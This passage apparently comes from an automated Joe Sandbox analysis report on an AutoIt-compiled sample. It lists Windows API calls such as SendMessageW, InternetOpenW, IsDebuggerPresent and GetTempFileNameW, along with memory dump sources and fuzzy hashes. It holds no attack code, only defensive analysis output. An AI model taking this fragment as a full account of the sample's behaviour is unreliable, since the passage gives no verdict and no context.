                                                                                                                                                                                                                                                                            • Opcode ID: 31acad43944ecf7fcb2457bc51b7f039302acf6d56b55fd43234e52a994ff443
                                                                                                                                                                                                                                                                            • Instruction ID: 9d8109523622b279255b7f6e249110f7c3a01777997713bac8ea24237eb7210a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31acad43944ecf7fcb2457bc51b7f039302acf6d56b55fd43234e52a994ff443
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C315971D01109ABCF15EFA0CC85AEEBFB8FF08344F000069F919A6166EB719A06DB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00C840BD
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C840F8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                            • Opcode ID: 3a697147a8b7bdc55f9fde59e7ff2e9516d06db2328e7c999c5aff782c049aa3
                                                                                                                                                                                                                                                                            • Instruction ID: a96c6f10eb8bf3660ae04465e416d9628a4d7b473eb7e3a030fbc4451f76a0ea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a697147a8b7bdc55f9fde59e7ff2e9516d06db2328e7c999c5aff782c049aa3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88319E71100605AADB24EF68CC80FFB73A9FF48768F008619FAA587190DB71AD81DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00C850BD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C850D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                            • Opcode ID: bebd101acc093bdf0106d518dd7757b4f40b182ac7dc6477f21d78c2ec4dfbbb
                                                                                                                                                                                                                                                                            • Instruction ID: 5316ca7b088ef62f05812276187964ced89e0e33efe67ad548fc95b60aefb922
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bebd101acc093bdf0106d518dd7757b4f40b182ac7dc6477f21d78c2ec4dfbbb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0311974A0170A9FDB14DFA9C980BDE7BB5FF49304F10406AE904AB391D7B1AA45CF94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C84216
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00C84230
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                            • Opcode ID: 85f40d42ca8ffedab9b904930bad3fcbe1a7bed9ea47b40d170fb76a509fbf65
                                                                                                                                                                                                                                                                            • Instruction ID: 92b8454d7a83839bd63a8057f4a1dd9e09e7012f4c0b1560256a062ec3a98f84
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f40d42ca8ffedab9b904930bad3fcbe1a7bed9ea47b40d170fb76a509fbf65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 341129B261020AAFDB00EFA8CC45AFE7BE8EB08358F014514FD65D3150D634E8519B54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C6D7C2
                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C6D7EB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                            • Opcode ID: 9399a9f29bbdebaba9ac1f8261e06d38f555df11a86fa62dec13ef2d5820ff3a
                                                                                                                                                                                                                                                                            • Instruction ID: 65af97d9c25c42da8a4ea381ff1c531cb07bc4d3e17c4117a797f0c0172f8743
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9399a9f29bbdebaba9ac1f8261e06d38f555df11a86fa62dec13ef2d5820ff3a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10110271B01232BED7344B628CC9FE7BE9CEB127A4F00422AB51A92184D2649940D2F2
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C5761D
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C57629
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                            • Opcode ID: e8eff67670d2bf19ebd0bce4fcaae2335505fdd1eba454f4edd814b2e7e7c52b
                                                                                                                                                                                                                                                                            • Instruction ID: f3337b1a12446cb3e4f526dcd3037096c18881754b9fece9d3d8c86049309759
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8eff67670d2bf19ebd0bce4fcaae2335505fdd1eba454f4edd814b2e7e7c52b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F01C43660492A8BCB109EBDEC50DBF77B5AB607517500624F83193191EF35DAC89694
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C52699
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 68d8fa2bbc554258f9ba9f5794c2986897ca24800db551cecdbf118f0b0840df
                                                                                                                                                                                                                                                                            • Instruction ID: c6a9d1ce5fb037e73bc722c1fbe6db1250c32e8fd92d31dd77b4ae5ea2279918
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d8fa2bbc554258f9ba9f5794c2986897ca24800db551cecdbf118f0b0840df
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9801F179640218ABCB08ABA0CC41CFE33F8EF46321B400629B832932C1EF31594C9658
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C52593
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 4ca4c031584a3fdc5fd086a9fe6496e473d9c17b49976b1cf868179c49496b44
                                                                                                                                                                                                                                                                            • Instruction ID: f2bb558382575cce9a30c68947da64037342008aeded830a073eeec6b0b2766e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ca4c031584a3fdc5fd086a9fe6496e473d9c17b49976b1cf868179c49496b44
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D01A7796401087BCB08EB90C962EFF77E8DF46342F9000297D12A3281EB109E4C97B9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C52615
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 00d382404f617df016d5941e5c4e4b2bae6ea65df104778864d3c5191ec25294
                                                                                                                                                                                                                                                                            • Instruction ID: aecc3fcb4cc308297abf85bd0778044617cde70df3069c39e861c4dce3555779
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00d382404f617df016d5941e5c4e4b2bae6ea65df104778864d3c5191ec25294
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD01D6B9A4010877CB09EBA0C901EFF77F89F06341F500025BD02A3281EF618E4CD6BA
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C52720
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 8f7682a97d6c4494253f56684c312cdf24e24904d8052dde7bda82474eae4d78
                                                                                                                                                                                                                                                                            • Instruction ID: 48d6bf624904ba7646f642ef67caa2184d424e4d45665787ec18de882ec3623a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f7682a97d6c4494253f56684c312cdf24e24904d8052dde7bda82474eae4d78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F0F479A4021867CB08E7A4CC41FFE73FCAF06391F400925B822A32C1DF60594C8268
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C5146F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                            • Opcode ID: ae6a1491166dcd91ae0ad332555467424d73f03d1fc02fa0aeaff40fa74b06f1
                                                                                                                                                                                                                                                                            • Instruction ID: 55ebf144570219d2aa4b012499ad3a6dc75c134f9410a55784968013ba7009a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae6a1491166dcd91ae0ad332555467424d73f03d1fc02fa0aeaff40fa74b06f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BE0D83228472836D6103794AC03FCD77C58F05B66F31482EFB59654C24EE224D0639D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C110E2,?,?,?,00BF100A), ref: 00C0FAD9
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C110E6
                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C110F5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C110F0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                            • Opcode ID: 06dd8e87ff8f3a3e0c6ff6e06fbc6b4a36de1ae1425a9fdb2c08aae7b8ee5e32
                                                                                                                                                                                                                                                                            • Instruction ID: fd296676ed34248d5f7d84132ba4cba3def07af64f76d8c5a20ef5753f9cbb5f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06dd8e87ff8f3a3e0c6ff6e06fbc6b4a36de1ae1425a9fdb2c08aae7b8ee5e32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FE06D706007518FD7309F28D90878ABBE4AB04301F188D6CE986C2691DBB8E884EBA1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C639F0
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C63A05
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                            • Opcode ID: 5e6c41483820b0b8206edd240c96c081b49b3a97f4765c5fda84c9f36a205113
                                                                                                                                                                                                                                                                            • Instruction ID: 900d54036c74d2398761bffdf491167296665753bd75d63b950484c9c0fc5f12
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e6c41483820b0b8206edd240c96c081b49b3a97f4765c5fda84c9f36a205113
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AD05EB250032867DA60A7649C0EFCF7B6CDB44721F0002A1BA56920D1DAB0DA85CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C82E08
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00C82E0F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
